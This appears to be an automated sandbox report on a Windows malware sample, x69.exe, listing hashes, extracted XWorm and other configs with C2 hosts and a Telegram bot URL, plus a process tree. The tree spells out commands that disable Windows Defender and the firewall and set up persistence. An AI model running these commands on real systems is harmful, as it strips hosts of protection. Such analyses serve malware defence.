Analysis

  • max time kernel
    102s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/05/2025, 21:14

General

  • Target

    x69.exe

  • Size

    285KB

  • MD5

    20841606ce69632f258221219aeee09b

  • SHA1

    b72918797186774598792c47b66d5857be59f576

  • SHA256

    1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83

  • SHA512

    aa1d6dcc49a66a5cef5fc64cae299c250bb5327d8d2e985db83e568b9d5acdde3b58249797f84fddcabf21210e194fa2ae3ca6b178286a3563d9574937e2b72e

  • SSDEEP

    6144:3RIUGV77XEc5EDEhp19jyVyFSXnIHq1h8tkEsjuIMN9lLk:uUG5oc5EDAU0F+18guI

Malware Config

Extracted

Family

xworm

Version

3.1

C2

grayhatgroupontop.zapto.org:1177

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7717722960:AAGvuHVf2skcG3rQxo21EcgaQuXDN-eZ9zs/sendMessage?chat_id=6757433004

Extracted

Family

latentbot

C2

grayhatgroupontop.zapto.org

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as real-time monitoring, block at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Detects Bdaejec Backdoor. 5 IoCs

    Bdaejec is a backdoor written in C++.

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • LatentBot

    Modular trojan written in Delphi which has been in the wild since 2013.

  • Latentbot family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 43 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 11 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 8 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 60 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:380
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4e50d135-7a6d-4d0f-a5bc-ef624923cc50}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:972
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:704
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1012
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1076
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                    PID:1148
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1204
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2264
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4092
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4600
                      • C:\Users\Admin\AppData\Roaming\x69.exe
                        C:\Users\Admin\AppData\Roaming\x69.exe
                        2⤵
                        • Executes dropped EXE
                        PID:3352
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                      1⤵
                        PID:1220
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1284
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1316
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1360
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1368
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1476
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2868
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1512
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1528
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1668
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1688
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1732
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1800
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1820
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1956
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1972
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1140
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1724
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1912
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2132
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2212
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2416
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2524
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2536
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2680
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2716
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2728
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2740
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2752
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                          1⤵
                                                                            PID:2968
                                                                          • C:\Windows\system32\wbem\unsecapp.exe
                                                                            C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                            1⤵
                                                                              PID:3032
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3152
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3332
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:3412
                                                                                  • C:\Users\Admin\AppData\Local\Temp\x69.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\x69.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Adds Run key to start application
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4904
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3956
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:3708
                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4556
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
                                                                                      3⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2580
                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                      "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
                                                                                      3⤵
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2412
                                                                                    • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2612
                                                                                      • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4120
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9942.tmp\9953.tmp\9954.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                        4⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1156
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3264
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4824
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3908
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3400
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2580
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2424
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4080
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3972
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4148
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4056
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4080
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1444
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4436
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                          5⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1432
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                            6⤵
                                                                                              PID:4440
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5032
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                              6⤵
                                                                                                PID:1404
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4308
                                                                                              • C:\Windows\system32\netsh.exe
                                                                                                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                6⤵
                                                                                                • Modifies Windows Firewall
                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                PID:4160
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                              5⤵
                                                                                                PID:3400
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                PID:3772
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                5⤵
                                                                                                  PID:4904
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                  5⤵
                                                                                                    PID:4056
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:1896
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:3756
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:2844
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4348
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                                    PID:4540
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                    5⤵
                                                                                                      PID:2424
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                        PID:3016
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                        5⤵
                                                                                                          PID:404
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                          5⤵
                                                                                                            PID:4308
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                            5⤵
                                                                                                              PID:4160
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              5⤵
                                                                                                                PID:4460
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                5⤵
                                                                                                                  PID:1680
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                  5⤵
                                                                                                                    PID:4320
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                    5⤵
                                                                                                                      PID:1432
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                      5⤵
                                                                                                                        PID:1852
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:4720
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                          5⤵
                                                                                                                            PID:4556
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                            5⤵
                                                                                                                              PID:1676
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                              5⤵
                                                                                                                                PID:848
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                5⤵
                                                                                                                                  PID:3672
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:4692
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:4240
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:1580
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:3224
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
                                                                                                                                    • Modifies Security services
                                                                                                                                    PID:1712
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    5⤵
